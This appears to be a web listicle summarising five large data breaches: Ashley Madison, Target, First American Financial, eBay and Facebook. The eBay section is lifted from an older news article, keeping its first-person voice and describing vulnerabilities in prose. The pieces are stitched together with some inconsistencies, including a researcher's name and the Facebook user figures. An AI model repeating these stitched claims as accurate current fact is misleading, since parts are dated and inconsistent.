1-Ashley Madison – 2015
While the information leaked in the hack of discreet extramarital dating website Ashley Madison was not financially significant, its cultural footprint was very wide. More than 30 million email addresses and hundreds of credit cards were leaked in the attack.
The hack also set off months of marital disputes that came from spouses searching for their partner’s email address in the leaked database of Ashley Madison.
Debate raged online about the ethics of news outlets reporting on famous people and politicians found in the company’s files. There were reports of hackers extorting people based on the information found on the site, demanding people pay a ransom in exchange for hiding evidence of affairs.
In 2017, the company settled a lawsuit filed by users for more than $11 million, but that did little to quell the social furor over the information and messages found on the website. The aftermath was said to have life-altering implications for some.
Police in Toronto attributed two suicides to information that came from the leak and a pastor in New Orleans wrote a suicide note detailing the fear and embarrassment he felt about being implicated in Ashley Madison leaks. The hack was one of the first to lead to real-world deaths
2-Target – 2013
The attack on Target is one of the biggest to hit a major retailer and involved a point-of-sale system that was compromised by malware.
The breach highlighted a problem that would come to dominate the cybersecurity conversation for the rest of the decade: third-party partners. Hackers gained access to Target’s systems through a heating and air-conditioning contractor working for the company.
With their access, the cybercriminals got payment card details for more than 40 million Target customers. The company was forced to admit that the number was even larger, with the actual amount of impacted customers reaching 110 million.
The attack had a devastating effect on Target, forcing the CIO to resign months after the attack and the company reported that it lost more than $160 million due to the breach.
Both Divatia and Maor said the hack was notable because it became the first of many major breaches involving third-party systems or companies.
3–First American Financial – 2019
Billion-dollar real estate title insurance company First American Financial had one of the biggest leaks of 2019, exposing 885 million files dating back more than 15 years.
The breach was exposed by the security reporter Brian Krebs, who wrote a lengthy blog post explaining how the massive insurance company exposed millions of mortgage deals, which featured bank account numbers and statements, mortgage and tax records, Social Security numbers, wire transaction receipts and drivers license images.
He was tipped off by a real estate developer who discovered that you could access any of the company’s documents just by changing the URL link. Although it is unclear whether any of the information was accessed and used, First American immediately took down the entire website.
4-A 2014 cyber attack on eBay stole login credentials of up to 145 million users
It’s not been more than 36 hours since eBay revealed it was hacked and we just come to know about three more critical vulnerabilities in eBay website that could allow an attacker to compromise users’ account once again, even if you have already reset your account password after the last announcement. eBay admitted to the massive data breach that affected 145 million registered users worldwide after its database was compromised. eBay urged its 145 million users to change their passwords after the cyber attack, but are passwords enough? eBay Data breach happened mainly because of their vulnerable infrastructure, not weak passwords. HACKER UPLOADED SHELL ON eBAY SERVER (UNPATCHED)
A critical security flaw in the eBay website for its employees could allow an attacker to upload a backdoor shell, claimed a security researcher, Jordan Jones who have unearthed the vulnerability.
Security researcher, Jordan Jones claims and tweeted from his account that he already reported the critical flaw to eBay, along with a proof-of-concept screenshot which shows that he has successfully uploaded a ‘shell.php’ file (as shown), a PHP script that allows the attacker to control the server – essentially a backdoor program.
PERSISTENT XSS VULNERABILITY ON eBAY (UNPATCHED) he found a Persistent Cross-Site Scripting (XSS) vulnerability on eBay’s auction pages that allowed him to inject arbitrary HTML and Javascript code into the eBay website.
Each time a user visits any infected auction page created by the attacker, the reported persistent XSS vulnerability will execute the unauthorized Javascript code on the users’ browser with a payload to steal their account cookies, in an effort to hijack the user’s account.
COOKIE RE-USE VULNERABILITY (UNPATCHED) In a separate experiment, we have discovered that eBay accepts the same login cookies again and again, even if the victims have logged out or reset their passwords.
Which means by using Michael’s persistent XSS vulnerability, one can steal eBay users’ account cookies in order to get an unauthorized access to the users’ respective accounts, without knowing their previous or updated passwords.
ACCOUNT HIJACKING VULNERABILITY (CRITICAL AND UNPATCHED)
An Egyptian security researcher ‘Yasser H. Ali’ informed The Hacker News about another critical vulnerability on the eBay website, that can seriously allow an attacker to hijack millions of user accounts in bulk and this exploit could be very successful in the targeted attacks. For now we are keeping technical details of this vulnerability hidden from our readers, Sorry; because it has not been yet addressed by the eBay security team. But last evening, as a proof of concept Mr.Yasser privately demonstrated the vulnerability step-by-step to ‘The Hacker News‘ team and we confirm – IT WORKS. We promise to share the technical details of this interesting flaw, once eBay team will patch it
5-More than 540 million Facebook users’ data was up for grabs on unprotected servers until April 2019.
A user in a low-level hacking forum on Saturday published the phone numbers and personal data of hundreds of millions of Facebook users for free.
The exposed data includes the personal information of over 533 million Facebook users from 106 countries, including over 32 million records on users in the US, 11 million on users in the UK, and 6 million on users in India. It includes their phone numbers, Facebook IDs, full names, locations, birthdates, bios, and, in some cases, email addresses.
Insider reviewed a sample of the leaked data and verified several records by matching known Facebook users’ phone numbers with the IDs listed in the data set. We also verified records by testing email addresses from the data set in Facebook’s password-reset feature, which can be used to partially reveal a user’s phone number.
A Facebook spokesperson told Insider that the data had been scraped because of a vulnerability that the company patched in 2019.
Old data or not, the fact that the data appears to have been obtained by scraping Facebook profiles further complicates the company’s equation with privacy, even as it has emerged relatively unscathed in the wake of the Cambridge Analytica data scandal, in which the British consulting firm amassed of the personal data of millions of Facebook users without their consent for purposes of political advertising
Leave a Reply